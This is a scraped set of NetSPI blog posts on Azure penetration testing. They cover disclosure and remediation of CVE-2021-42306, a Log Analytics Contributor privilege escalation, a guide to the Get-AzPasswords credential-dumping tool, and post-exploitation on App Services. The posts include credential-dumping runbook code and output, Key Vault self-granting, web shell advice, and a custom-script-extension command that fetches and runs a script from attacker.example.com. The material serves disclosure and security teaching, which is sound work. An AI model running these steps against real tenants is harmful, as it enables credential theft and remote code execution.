One important remediation step to note here is the removal of the previous certificate. If the previous credential has not yet expired it will still be viable for authentication. To fully remediate the issue, the new certificate must be generated, and the old certificate will need to be removed from the App Registration.
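
If you're doing that cleanup with the Az PowerShell module, the old credential can be listed and removed by its KeyId. Here's a hedged example with placeholder IDs, not a copy of the actual remediation script:

# Placeholder App (Client) ID for the affected App Registration
$appId = "00000000-0000-0000-0000-000000000000"

# List the certificate credentials and note the KeyId of the old "Run as" cert
Get-AzADAppCredential -ApplicationId $appId

# Remove the old, potentially exposed credential by its KeyId
Remove-AzADAppCredential -ApplicationId $appId -KeyId "11111111-1111-1111-1111-111111111111"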

Now that our example has been remediated, we can see that the new manifest value decodes to the public key for the certificate.

I worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. You can read Microsoft’s disclosure materials online here.

A representative from MSRC shared the following details with NetSPI regarding the remediation steps taken by Microsoft:

  • Impacted Azure services have deployed updates that prevent clear text private key data from being stored during application creation. 
  • Additionally, Azure Active Directory deployed an update that prevents access to private key data previously stored. 
  • Customers will be notified via Azure Service Health and should perform the mitigation steps specified in the notification to remediate any confirmed impacted Application and/or Service Principal.

Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account "Run as" certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.  

Summary

This was one of the fastest issues that I’ve seen go through the MSRC pipeline. I really appreciate the quick turnaround and the open lines of communication that we had with the MSRC team; they were great to work with on this issue.

Below is the timeline for the vulnerability:

  • 10/07/2021 – Initial report submitted to MSRC
  • 10/08/2021 – MSRC assigns a case number to the submission
  • October 2021 – Back-and-forth emails and clarification with MSRC
  • 10/29/2021 – NetSPI confirms initial MSRC remediation
  • 11/17/2021 – Public Disclosure

While this was initially researched in a test environment, this issue was quickly escalated once we identified it in client environments. We want to extend special thanks to the clients that worked with us in identifying the issue in their environment and their willingness to let us do a spot check for an unknown vulnerability.

Looking for an Azure cloud pentesting partner? Connect with NetSPI: https://www.netspi.com/contact-us/

Addendum

NetSPI initially discovered this issue with Automation Account "Run as" certificates. MSRC's blog post details that two additional services were affected: Azure Migrate and Azure Site Recovery. These two services also create App Registrations in Azure Active Directory and were affected by the same issue which caused private keys to be stored in App Manifests. It is also possible that manually created Azure AD applications and Service Principals had private keys stored in the same manner.

We recommend taking the same remediation steps for any service principals associated with these services. Microsoft has published tooling to help identify and remediate the issue in each of these scenarios. Their guides and scripts are available here: https://github.com/microsoft/aad-app-credential-tools

[post_title] => CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory [post_excerpt] => The vulnerability, found by NetSPI’s cloud pentesting practice director, Karl Fosaaen, affects any organization that uses Automation Account "Run as" accounts in Azure. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-cloud-vulnerability-credmanifest [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:45 [post_modified_gmt] => 2022-12-16 16:51:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26684 [menu_order] => 289 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 26468 [post_author] => 10 [post_date] => 2021-09-14 04:00:29 [post_date_gmt] => 2021-09-14 09:00:29 [post_content] =>

NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications:

As companies move more and more of their infrastructure to the cloud, they're forced to shift their approach to security. The security controls you need to put in place for a cloud-based infrastructure are different from those for a traditional datacenter. There are also threats specific to a cloud environment. A mistake could put your data at risk.

It's no surprise that hiring managers are looking for candidates who can demonstrate their cloud security know-how—and a number of companies and organizations have come up with certifications to help candidates set themselves apart. As in many other areas of IT, these certs can help give your career a boost.

But which certification should you pursue? We spoke to a number of IT security pros to get their take on those that are the most widely accepted signals of high-quality candidates. These include cloud security certifications for both relative beginners and advanced practitioners.

Going beyond certifications

All of these certs are good ways to demonstrate your skills to your current or potential future employers — they're "a good way to get your foot in the door at a company doing cloud security and they're good for getting past a resume filter," says Karl Fosaaen, Cloud Practice Director at NetSPI. That said, they certainly aren't a be-all, end-all, and a resume with nothing but certifications on it will not impress anybody.

"Candidates need to be able to show an understanding of how the cloud components work and integrate with each other for a given platform," Fosaaen continues. "Many of the currently available certifications only require people to memorize terminology, so you don't have a guaranteed solid candidate if they simply have a certification. For those hiring on these certifications, make sure that you're going the extra level to make sure the candidates really do understand the cloud providers that your organization uses."

Fosaaen recommends pursuing specific trainings to further burnish your resume, such as the SANS Institute's Cloud Penetration Testing course, BHIS's Breaching The Cloud Perimeter, or his own company's Dark Side Ops Training. Concrete training courses like these can be a great complement to the "book learning" of a certification.

To learn more, read the full article here: https://www.csoonline.com/article/3631530/8-top-cloud-security-certifications.html

[post_title] => CSO: 8 top cloud security certifications [post_excerpt] => NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cso-8-top-cloud-security-certifications [to_ping] => [pinged] => [post_modified] => 2023-08-22 09:13:50 [post_modified_gmt] => 2023-08-22 14:13:50 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26468 [menu_order] => 305 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 11855 [post_author] => 10 [post_date] => 2021-09-13 10:00:00 [post_date_gmt] => 2021-09-13 15:00:00 [post_content] =>

TL;DR - This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.

The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.

Given the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.

Escalating Azure Permissions

Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.

These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.

Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).

Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.

Attack Walkthrough

Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. We need to be an Owner on the subscription to create this account, as contributors do not have rights to add the Run As account.

Add Automation Account

Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.

Access Control

In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.

Role added

On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.

PS C:\temp> Connect-AzAccount

Account                 SubscriptionName TenantId     Environment
-------                 ---------------- --------     -----------
LogAnalyticsContributor kfosaaen         6[REDACTED]2 AzureCloud

Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.

PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Using the Get-AzPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate for the Automation Account.

PS C:\temp> Get-AzPasswords -Verbose 
VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED]
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account
VERBOSE: Password Dumping Activities Have Completed

We then used the MicroBurst created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID - d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.

PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1

   PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My

Thumbprint                               Subject
----------                               -------
A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5

Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud],
               [AzureUSGovernment, AzureUSGovernment]}
Context      : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp> Get-AzContext | select Account,Subscription

Account                              Subscription
-------                              ------------
d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5
PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
RoleAssignmentId : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352
Scope : /subscriptions/7a[REDACTED]b5
DisplayName : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=
SignInName :
RoleDefinitionName : Contributor
RoleDefinitionId : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
ObjectType : ServicePrincipal
CanDelegate : False
Description :
ConditionVersion :
Condition :

MSRC Submission Timeline

Microsoft was great to work with on the submission and they were quick to respond to the issue. They have since removed the Automation Accounts permissions from the affected role and updated documentation to reflect the issue.

Custom Azure Automation Contributor Role

Here’s a general timeline of the MSRC reporting process:

  • NetSPI initially reports the issue to Microsoft – 10/15/20
  • MSRC Case 61630 created – 10/19/20
  • Follow up email sent to MSRC – 12/10/20
  • MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
  • Multiple back and forth emails to determine disclosure timelines – March-July 2021
  • Microsoft updates the role documentation to address the issue – July 2021
  • NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
  • Microsoft removes Automation Account permissions from the LAC Role – August 2021

Postscript

While this blog doesn’t address how to escalate up from the Log Analytics Contributor role, there are many ways to pivot from the role. Here are some of its other permissions: 

                "actions": [
                    "*/read",
                    "Microsoft.ClassicCompute/virtualMachines/extensions/*",
                    "Microsoft.ClassicStorage/storageAccounts/listKeys/action",
                    "Microsoft.Compute/virtualMachines/extensions/*",
                    "Microsoft.HybridCompute/machines/extensions/write",
                    "Microsoft.Insights/alertRules/*",
                    "Microsoft.Insights/diagnosticSettings/*",
                    "Microsoft.OperationalInsights/*",
                    "Microsoft.OperationsManagement/*",
                    "Microsoft.Resources/deployments/*",
                    "Microsoft.Resources/subscriptions/resourcegroups/deployments/*",
                    "Microsoft.Storage/storageAccounts/listKeys/action",
                    "Microsoft.Support/*"
                ]

More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.
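
Both of those pivots can be illustrated with a couple of Az module calls. This is a hedged sketch with placeholder resource names, not commands from the original assessment:

# Run a script on a VM by pushing a Custom Script Extension (placeholder names)
Set-AzVMCustomScriptExtension -ResourceGroupName "TargetRG" -VMName "TargetVM" `
    -Location "eastus" -Name "testExtension" `
    -FileUri "https://attacker.example.com/script.ps1" -Run "script.ps1"

# List the keys for a Storage Account via the listKeys/action permission
Get-AzStorageAccountKey -ResourceGroupName "TargetRG" -Name "targetstorage"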

Looking for an Azure pentesting partner? Consider NetSPI.

[post_title] => Escalating Azure Privileges with the Log Analytics Contributor Role [post_excerpt] => Learn how cloud pentesting expert Karl Fosaaen found and reported a Microsoft Azure vulnerability that allowed an Azure AD user to escalate from the Log Analytics Contributor role to the full Subscription Contributor role. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => escalating-azure-privileges-with-the-log-analystics-contributor-role [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:24:10 [post_modified_gmt] => 2023-03-16 14:24:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11855 [menu_order] => 306 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 26141 [post_author] => 53 [post_date] => 2021-08-13 15:12:35 [post_date_gmt] => 2021-08-13 20:12:35 [post_content] =>
Watch Now

Whether it's the migration of legacy systems or the creation of brand-new applications, many organizations are turning to Microsoft’s Azure cloud as their platform of choice. This brings new challenges for penetration testers who are less familiar with the platform, and now have more attack surfaces to exploit. In an attempt to automate some of the common Azure escalation tasks, the MicroBurst toolkit was created to contain tools for attacking different layers of an Azure tenant. In this talk, we will be focusing on the password extraction functionality included in MicroBurst. We will review many of the places that passwords can hide in Azure, and the ways to manually extract them. For convenience, we will also show how the Get-AzPasswords function can be used to automate the extraction of credentials from an Azure tenant. Finally, we will review a case study on how this tool was recently used to find a critical issue in the Azure permissions model that resulted in a fix from Microsoft.

[wonderplugin_video iframe="https://youtu.be/m1xxLZVtSz0" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Azure Pentesting: Extracting All the Azure Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-pentesting-extracting-all-the-azure-passwords [to_ping] => [pinged] => [post_modified] => 2023-06-22 20:06:04 [post_modified_gmt] => 2023-06-23 01:06:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=26141 [menu_order] => 37 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 11753 [post_author] => 10 [post_date] => 2020-10-22 07:00:26 [post_date_gmt] => 2020-10-22 07:00:26 [post_content] =>

It has been a while since the initial release (August 2018) of the Get-AzurePasswords module within MicroBurst, so I figured it was time to do an overview post that explains how to use each option within the tool. Since each targeted service in the script has a different way of getting credentials, I want users of the tool to really understand how things are working.

For those that just want to jump to information on specific services, each service has its own section below.

Additionally, we've renamed the function to Get-AzPasswords to match the PowerShell modules that we're using in the function.

AzureRM Versus Az

As of March 19, 2020, we pushed some changes to MicroBurst to switch the cmdlets over to the Az PowerShell modules (from AzureRM). This was a much-needed switch, as the AzureRM modules are being replaced by the Az modules.

Along with these updates, I also wanted to make some additions to the Get-AzurePasswords functionality. Since we reorganized all of the code in MicroBurst to match up with the related supporting modules (Az, AzureAD, MSOL, etc.), we thought it was important to separate out function names based on the modules each script uses.

Get-AzurePasswords will still live in the AzureRM folder in MicroBurst, but it will not be updated with any new functionality. Going forward, I highly recommend that everyone switch over to the newly renamed version, "Get-AzPasswords", in the Az folder in MicroBurst.

Important Script Usage Note - Some of these functions can make minor temporary changes to an Azure subscription (see Automation Accounts). If you Ctrl+C during the script execution, you may end up with unintended files or changes in your subscription.

I'll cover each of these concerns in the sections below, but have patience when running these functions. I know Azure can have its slow moments, so (in most cases) just give the script a moment to catch up and everything should be good. I haven't been keeping track, but I believe I've lost several months of time waiting for automation runbook jobs to complete.

Function Usage

For each service section, I've noted the script flag that you can use to toggle ("-Keys Y" versus "-Keys N") the collection of that specific service. Running the script with no flags will gather credentials from all services.

Step 1. Import the MicroBurst Module

PS C:\MicroBurst> Import-Module .\MicroBurst.psm1
Imported Az MicroBurst functions
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Step 2. Authenticate to the Azure Tenant

PS C:\MicroBurst> Login-AzAccount

Account           SubscriptionName  TenantId                             Environment
-------           ----------------  --------                             -----------
test@example.com  TestSubscription  4712345a-6543-b5s4-a2b2-e01234567895 AzureCloud

Step 3. Gather Passwords

PS C:\MicroBurst> Get-AzPasswords -Verbose
VERBOSE: Logged In as test@example.com
VERBOSE: Getting List of Key Vaults...
VERBOSE:  Exporting items from testingKeys
VERBOSE:   Getting Key value for the testKey Key
VERBOSE:   Getting Secret value for the TestKey Secret
VERBOSE: Getting List of Azure App Services...
VERBOSE:  Profile available for microburst-application
VERBOSE: Getting List of Azure Container Registries...
VERBOSE: Getting List of Storage Accounts...
VERBOSE:  Getting the Storage Account keys for the teststorage account
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE:  Getting the RunAs certificate for autoadmin using the XZvOYzsuBiGbfqe.ps1 Runbook
VERBOSE:   Waiting for the automation job to complete
VERBOSE:    Run AuthenticateAs-autoadmin-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE:   Removing XZvOYzsuBiGbfqe runbook from autoadmin Automation Account
VERBOSE:  Getting cleartext credentials for the autoadmin Automation Account
VERBOSE:   Getting cleartext credentials for test using the dOFtWgEXIQLlRfv.ps1 Runbook
VERBOSE:    Waiting for the automation job to complete
VERBOSE:    Removing dOFtWgEXIQLlRfv runbook from autoadmin Automation Account
VERBOSE: Password Dumping Activities Have Completed

*Running this will prompt you (via "Out-GridView") to select the subscription(s) to gather credentials from.

For easier output management, I'd recommend piping the output to either "Out-GridView" or "Export-CSV".

With that housekeeping out of the way, let's dive into the credentials that we're able to gather with Get-AzPasswords.

Key Vaults (-Keys Y)

Azure Key Vaults are Microsoft’s solution for storing sensitive data (Keys, Passwords/Secrets, Certs) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores.

Vault access is controlled by the Access Policies in each vault, but any users with Contributor rights are able to give themselves access to a Key Vault. Get-AzPasswords will not modify any Key Vault Access Policies, but you could give your account read permissions on the vault if you really needed to read a key.
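
If you did need to grant yourself that access, it would look something like the following. This is a hedged example with placeholder names (and an access policy you would want to remove and disclose on a real engagement):

# Grant our current user read access to keys and secrets in a vault (placeholder names)
Set-AzKeyVaultAccessPolicy -VaultName "targetVault" -UserPrincipalName "user@example.com" `
    -PermissionsToKeys get,list -PermissionsToSecrets get,list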

An example Key Vault Secret:

[Screenshot: an example Key Vault secret in the Azure portal]

Get-AzPasswords will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificate files locally with the "-ExportCerts Y" flag.

Sample Output:

Type : Key
Name : DiskKey
Username : N/A
Value : {"kid":"https://notArealVault.vault.azure.net/keys/DiskKey/63abcdefghijklmnop39","kty ":"RSA","key_ops":["sign","verify","wrapKey","unwrapKey","encrypt","decrypt"],"n":"v[REDACTED]w","e":"AQAB"}
PublishURL : N/A
Created : 5/19/2020 5:20:12 PM
Updated : 5/19/2020 5:20:12 PM
Enabled : True
Content Type : N/A
Vault : notArealVault
Subscription : NotARealSubscription

Type : Secret
Name : TestKey
Username : N/A
Value : Karl'sPassword
PublishURL : N/A
Created : 3/7/2019 9:28:37 PM
Updated : 3/7/2019 9:28:37 PM
Enabled : True
Content Type : Password
Vault : notArealVault
Subscription : NotARealSubscription

Finally, access to the Key Vaults may be restricted by network, so you may need to run this from an Azure VM on the subscription, or from an IP in the approved "Private endpoint and selected networks" list. These settings can be found under the Networking tab in the Azure portal.

Alternatively, you may need to use an automation account "Run As" account to request the keys. Steps to complete that process are outlined here.

App Services (-AppServices Y)

Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using app services and the configurations (passwords) are pushed to the applications via the App Services profiles.

In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile.

These publish profiles will contain Web and FTP credentials that can be used to get access to the App Service's files. In addition to that, any stored connection strings should also be available in the file. All available profile credentials are parsed by Get-AzPasswords, so it's easy to gather credentials for multiple App Services applications at once.

Sample Output:

Type         : AppServiceConfig
Name         : appServicesApplication - Web Deploy
Username     : $appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : appServicesApplication.scm.azurewebsites.net:443
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type         : AppServiceConfig
Name         : appServicesApplication - FTP
Username     : appServicesApplication$appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : ftp://appServicesApplication.ftp.azurewebsites.windows.net/site/wwwroot
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type : AppServiceConfig
Name : appServicesApplication-Custom-ConnectionString
Username : N/A
Value : metadata=res://*/Models.appServicesApplication.csdl|res://*/Models.appServicesApplication.ssdl|res://*/Models.appServicesApplication.msl;provider=System.Data.SqlClient;provider connection string="Data Source=abcde.database.windows.net;Initial Catalog=app_Enterprise_Prod;Persist Security Info=True;User ID=psqladmin;Password=somepassword9" 
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : ConnectionString
Vault : N/A
Subscription : NotARealSubscription

Potential next steps for App Services have been outlined in another NetSPI blog post here.

Automation Accounts (-AutomationAccounts Y)

Automation Accounts are one of the ways that you can automate jobs and routine tasks within Azure. These tasks (Runbooks) are frequently run with stored credentials, or with the service account (Run As "Connections") tied to the Automation Account.

Both of these credential types can be returned with Get-AzPasswords and can potentially allow for privilege escalation. In order to gather these credentials from the Automation Accounts, we need to create new runbooks that will cast the credentials out to variables that are then printed to the runbook job output.
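
As a rough illustration, the core of one of those credential-dumping runbooks can be as simple as the following sketch ("StoredCredName" is a placeholder, and the real function generates and cleans up randomly named runbooks for you):

# Inside an Automation runbook: pull a stored credential asset and print it
$cred = Get-AutomationPSCredential -Name "StoredCredName"
$cred.UserName
$cred.GetNetworkCredential().Password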

To protect these credentials in the output, we've implemented an encryption scheme in Get-AzPasswords that encrypts the job output.

The Run As certificates (covered in another blog) can then be used to authenticate (run the AuthenticateAs PS1 script) from your testing system as the stored Run As connection.

Any stored credentials may have a variety of uses, but I've frequently seen domain accounts being stored here, so that can lead to some interesting lateral movement options.

Sample Output:

Type : Azure Automation Account
Name : kfosaaen
Username : test
Value : testPassword
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : Password
Vault : N/A
Subscription : NotARealSubscription

As a secondary note here, you can also request bearer tokens for the Run As automation accounts from a custom runbook. I cover the process in this blog post; it's not included in Get-AzPasswords, but it is an additional way to get a credential from an Automation Account.

And one final note on gathering credentials from Automation Accounts. It was noted above, but sometimes Azure Automation Accounts can be slow to respond. If you're having issues getting a runbook to run and cancel the function execution before it completes, you will need to manually go in and clean up the runbooks that were created as part of the function execution.

These will always be named with a 15-character random string of letters (i.e., lwVSNvWYpPXCcDd). You will also have local files in your execution directory to clean up; they will have the same names as the runbooks that were uploaded for execution.

Storage Account Keys (-StorageAccounts Y)

Storage Accounts are the multipurpose (Public/Private files, tables, queues) service for storing data in an Azure subscription. This section is pretty simple compared to the previous ones, but gathering the account keys is an easy way to maintain persistence in a sensitive data store. These keys can be used with the Azure Storage Explorer application to remotely mount storage accounts.

These access keys can easily be cycled, but if you're looking for persistence in a Storage Account, these would be your best bet. Additionally, if you're modifying Cloud Shell files for escalation/persistence, I'd recommend holding on to a copy of these keys for any Cloud Shell storage accounts.

Sample Output:

Type         : Storage Account
Name         : notArealStorageAccount
Username     : key1
Value        : W84[REDACTED]==
PublishURL   : N/A
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Key
Vault        : N/A
Subscription : NotARealSubscription
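
If you'd rather use a gathered key from PowerShell instead of Storage Explorer, a storage context makes that quick. A hedged sketch, with placeholder account and resource group names:

# Build a storage context from a gathered key and list the containers
$key = (Get-AzStorageAccountKey -ResourceGroupName "TargetRG" -Name "notarealstorage")[0].Value
$ctx = New-AzStorageContext -StorageAccountName "notarealstorage" -StorageAccountKey $key
Get-AzStorageContainer -Context $ctx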

Azure Container Registries (-ACR Y)

Azure Container Registries are used in Azure to manage Docker images for use within Azure Kubernetes Service (AKS) or as container instances (either in Azure or elsewhere). More often than not, we will find keys and credentials stored in these container images.

In order to authenticate to the repositories, you can either use the AZ CLI with AzureAD credentials, or there can be an "Admin user". If you have AzureAD user rights to pull the admin password for a container registry, you should already have rights to authenticate to the repositories with the AZ CLI, but if an Admin user is enabled for the registry, this user could then be used for persistence when you lose access to the initial AzureAD user.

Fun Fact - Any AzureAD user with "Reader" permissions on the Container Registry is able to connect to the repositories and pull images down with Docker.
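
As a quick illustration, pulling an image down with the AZ CLI and Docker looks something like this ("myregistry" and the repository name are placeholders):

az acr login --name myregistry
docker pull myregistry.azurecr.io/somerepository:latest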

For more information on using these credentials, here's another NetSPI blog.

Conclusion

There was a lot of ground to cover here, but hopefully this does a good job of explaining all of the functionality available in Get-AzPasswords. It's worth noting that most of this functionality relies on your AzureAD user having Contributor IAM rights on the applicable service. While some may argue that Contributor access is equivalent to admin in a subscription, I would argue that most subscriptions primarily consist of Contributor users.

If there are any sources for Azure passwords that you would like to see added to Get-AzPasswords, feel free to make a pull request on the MicroBurst GitHub repository.

[post_title] => A Beginners Guide to Gathering Azure Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => a-beginners-guide-to-gathering-azure-passwords [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:26:00 [post_modified_gmt] => 2023-03-16 14:26:00 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11753 [menu_order] => 399 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 11728 [post_author] => 10 [post_date] => 2020-08-17 07:00:59 [post_date_gmt] => 2020-08-17 07:00:59 [post_content] =>

We test a lot of web applications at NetSPI, and as everyone continues to move their operations into the cloud, we're running into more instances of applications being run on Azure App Services.

Whenever we run into an App Services application with a serious vulnerability, I'll frequently get a ping asking about next steps to take in an Azure environment. This blog will hopefully answer some of those questions.

Initial Access

We will be primarily talking about command execution on an App Services host. There are plenty of other vulnerabilities (SQLi, SSRF, etc.) that we could put into the context of Azure App Services, but we'll save those for another blog.

For our command injection examples, we'll assume that you've used one of the following methods to execute commands on a system:

  • An uploaded web shell
  • Unintended CMD injection via an application issue
  • Intended CMD Injection through application functionality

Alternatively, keep in mind that Azure Portal Access (with an account with Contributor rights on an app) also allows you to run commands from the App Services Console. This will be important if there's a higher privileged Managed Identity in use by the app, and we want to use this to escalate Azure permissions.

For the sake of simplicity, we'll also assume that this is a relatively clean command injection (See Web Shell), where you can easily see the results of your commands. If we want to get really complicated, we could talk about using side channels to exfiltrate command results, but that's also for another blog.

Azure "App Services"

To further complicate matters, Azure App Services encompasses "Function Apps" and "App Service Apps". There are some key differences between the two, but for the purposes of this blog, we'll consider them to be the same. Additionally, there are Linux and Windows options for both, so we'll try to cover options for those as well.

If you want to follow along with your own existing App Services app, you can use the Console (or SSH) section in the Development Tools section of the Azure Portal for your App Services app.

Choose Your Own Adventure

With command execution on the App Services host, there are a couple of paths that you can take, which we'll walk through in the sections below.

Looking Locally

First things first, this is an application server, so you might want to look at the application files.

  • The application source code files can (typically) be found at the %DEPLOYMENT_SOURCE%
  • The actual working files for the application can (typically) be found at %DEPLOYMENT_TARGET%
  • Or /home/site/wwwroot if you're working with a Linux system

If you're operating on a bare bones shell at this point, I would recommend pulling down an appropriate web shell to your %DEPLOYMENT_TARGET% (or /home/site/wwwroot) directory. This will allow you to upgrade your shell and allow you to better explore the host.

Just remember, this app server is likely facing the internet and a web shell without a password easily becomes someone else's web shell.

Within the source code files, you can also look for common application configuration files (web.config, etc.) that might contain additional secrets that you could use to pivot through to other services (as we'll see later in the blog).

Looking at the Environment

On an App Services host, most of your configuration variables will be available as environmental variables on the host. These variables will most likely contain keys that we can use to pivot to other Azure services in the subscription.

Since you're most likely to have a cmd.exe shell, you can just use the "set" command to list out all of the environmental variables. It will look like this (without the redactions):

[Screenshot: Windows environment variable listing from "set"]

If you're using PowerShell for your command execution, you can use the "dir env: | ft -Wrap" command to do the same. Make sure that you're piping to "ft -Wrap", as that will allow the full text values to be returned without being truncated.

Alternatively, if you're in a Linux shell, you can use the "printenv" command to accomplish the same:

[Screenshot: Linux environment variable listing from "printenv"]

Now that we (hopefully) have some connection strings for Azure services, we can start getting into other services.

Accessing Storage Accounts

If you're able to find an Azure Storage Account connection string, you should be able to remotely mount that storage account with the Azure Storage Explorer.

Here are a couple of common Windows environmental variables that hold those connection strings:

  • APPSETTING_AzureWebJobsStorage
  • APPSETTING_WEBSITE_CONTENTAZUREFILECONNECTIONSTRING
  • AzureWebJobsStorage
  • WEBSITE_CONTENTAZUREFILECONNECTIONSTRING

Additionally, you may find these strings in the application configuration files. Keep an eye out for any config files containing "core.windows.net", storage, blob, or file in them.

